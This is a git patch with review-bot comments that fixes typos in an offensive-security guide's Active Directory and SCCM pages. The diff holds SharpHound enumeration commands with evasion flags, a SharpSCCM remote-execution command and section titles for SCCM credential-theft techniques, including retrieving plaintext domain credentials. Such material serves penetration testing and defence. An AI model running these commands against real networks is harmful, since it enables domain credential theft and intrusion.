From 581fdf4f18fa9f97b7f8a0e4d487f1f055309c77 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 22 Mar 2024 12:41:22 +0100 Subject: [PATCH] SCCM typos + SharpHound new args --- docs/active-directory/ad-adds-enumerate.md | 3 ++- docs/active-directory/deployment-sccm.md | 16 ++++++++-------- 2 files changed, 10 insertions(+), 9 deletions(-) diff --git a/docs/active-directory/ad-adds-enumerate.md b/docs/active-directory/ad-adds-enumerate.md index f69c6f5..f50f9bd 100644 --- a/docs/active-directory/ad-adds-enumerate.md +++ b/docs/active-directory/ad-adds-enumerate.md @@ -23,7 +23,8 @@ Use the correct collector: .\SharpHound.exe -c all --LdapUsername --LdapPassword --JSONFolder .\SharpHound.exe -c all --LdapUsername --LdapPassword --domaincontroller 10.10.10.100 -d active.htb - .\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23 + + .\SharpHound.exe -c All,GPOLocalGroup --outputdirectory C:\Windows\Temp --prettyprint --randomfilenames --collectallproperties --throttle 10000 --jitter 23 --outputprefix internalallthething ``` * Use [BloodHoundAD/SharpHound.ps1](https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1) - run the collector on the machine using Powershell ```powershell diff --git a/docs/active-directory/deployment-sccm.md b/docs/active-directory/deployment-sccm.md index 1642ae9..2b00a8c 100644 --- a/docs/active-directory/deployment-sccm.md +++ b/docs/active-directory/deployment-sccm.md @@ -10,7 +10,7 @@ * Using **SharpSCCM** ```ps1 - .\SharpSCCM.exe get device --server --site-code + .\SharpSCCM.exe get devices --server --site-code .\SharpSCCM.exe exec -d -r .\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug ``` 
@@ -81,13 +81,13 @@ * [Misconfiguration-Manager - CRED-1](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-1/cred-1_description.md) -Requirements: +**Requirements**: * On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\PxeInstalled` = 1 * On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\IsPxe` = 1 * PXE-enabled distribution point -Exploitation: +**Exploitation**: * [csandker/pxethiefy](https://github.com/csandker/pxethiefy) ```ps1 @@ -101,12 +101,12 @@ Exploitation: * [Misconfiguration-Manager - CRED-2](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md) -Requirements: +**Requirements**: * PKI certificates are not required for client authentication * Domain accounts credential -Exploitation: +**Exploitation**: Create a machine or compromise an existing one, then request policies such as `NAAConfig` @@ -116,7 +116,7 @@ SharpSCCM get naa ``` -### CRED-3 Extract currently deployed credentials stored as DPAPI blobs and decrypt +### CRED-3 Extract currently deployed credentials stored as DPAPI blobs > Dump currently deployed secrets via WMI. If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials. @@ -158,7 +158,7 @@ From a remote machine. ``` -### CRED-4 Extract legacy credentials stored as DPAPI blobs and decrypt +### CRED-4 Extract legacy credentials stored as DPAPI blobs * [Misconfiguration-Manager - CRED-4](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-4/cred-4_description.md) @@ -187,7 +187,7 @@ From a remote machine. -### CRED-5 Extract and decrypt the SC_UserAccount table from the site database +### CRED-5 Extract the SC_UserAccount table from the site database * [Misconfiguration-Manager - CRED-5](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-5/cred-5_description.md)
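Review bot: In the `ad-adds-enumerate.md` hunk (`@@ -23,7 +23,8`), the replacement SharpHound line uses `-c All` while the two unchanged example lines above it still use `-c all`, and an empty `+` line is added inside the fenced block. Use one casing across all three examples and drop the blank line unless the visual separation is intended. The new line also no longer carries `--nosavecache` and `--encryptzip`, which the subject "SharpHound new args" does not explain; the commit message should say whether those options were renamed or removed, so readers comparing against the old page know the omission is deliberate.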
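Review bot: In the CRED-1 hunk of `deployment-sccm.md` (`@@ -81,13 +81,13`), `**Requirements**:` and `**Exploitation**:` leave the colon outside the bold markers and use bold text as a stand-in for a heading. Either write `**Requirements:**` or promote both labels to a real sub-heading level so they appear in the page outline, and apply the same choice to the identical labels changed in the `@@ -101,12` hunk.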
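Review bot: The unchanged context line `* Domain accounts credential` in the CRED-2 hunk (`@@ -101,12 +101,12`) is still ungrammatical even though the commit subject is about typo fixes. Since the list directly above the edited `**Exploitation**:` label is already in view, change it to `* Domain account credentials` in the same commit.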
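Review bot: Renaming the `### CRED-3` heading in the `@@ -116,7 +116,7` hunk changes the anchor that renderers derive from heading text, so any table of contents entry or cross-page link pointing at the old heading will stop resolving. Search the docs for links to the old CRED-3, CRED-4 and CRED-5 anchors (the `@@ -158,7` and `@@ -187,7` hunks rename those headings the same way) and update them in this commit. The quoted description under CRED-3 still ends with "retrieve plaintext domain credentials", so confirm that dropping "and decrypt" from the titles still describes what each section covers.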